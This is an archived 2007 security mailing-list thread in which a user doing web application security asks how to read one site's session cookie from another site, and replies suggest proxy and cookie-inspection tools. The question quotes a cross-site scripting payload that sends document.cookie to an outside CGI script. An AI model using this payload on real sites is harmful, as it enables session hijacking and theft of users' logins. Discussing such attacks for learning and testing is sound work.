Security Basics mailing list archives
RE: Getting cookies
From: "MARTIN Benoni" <benoni.martin () arcelor com>
Date: Mon, 29 Jan 2007 10:19:47 +0100
Cookie digger from foudstone might help you (free download) -----Message d'origine----- De : listbounce () securityfocus com [mailto:listbounce () securityfocus com] De la part de crazy frog crazy frog Envoyé : mercredi 24 janvier 2007 17:44 À : Mac Mohan Cc : security-basics () securityfocus com Objet : Re: Getting cookies HI, You can use paros proxy for that. On 1/24/07, Mac Mohan <security.mac () gmail com> wrote:
Hi I am trying to do the application security of a web site. Apart from that, i am trying to learn how things work actually. Kindly help me. Let's say two sites are opened in IE. I would like to get the cookies of Site A after opening a page in Site B. Please let me know how to get the JSESSIONID value of the web site from another totally different web site. I know the way to get the cookies of a page from cross site scripting of the page through <script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie;</script> but dont know how to get cookies of one site from another site... Is this possible? Kindly let me know -thanks 'n' regards Mac
-- --------------------------------------- http://www.secgeeks.com get a blog on secgeeks :) register here:- http://secgeeks.com/user/register rss feeds :- http://secgeeks.com/node/feed Submit you security articles,send them to secgeek () secgeeks com http://www.newskicks.com Submit and kick for new stories from all around the world. ---------------------------------------
Current thread:
- Getting cookies Mac Mohan (Jan 24)
- Re: Getting cookies crazy frog crazy frog (Jan 24)
- RE: Getting cookies MARTIN Benoni (Jan 29)
- Re: Getting cookies crazy frog crazy frog (Jan 24)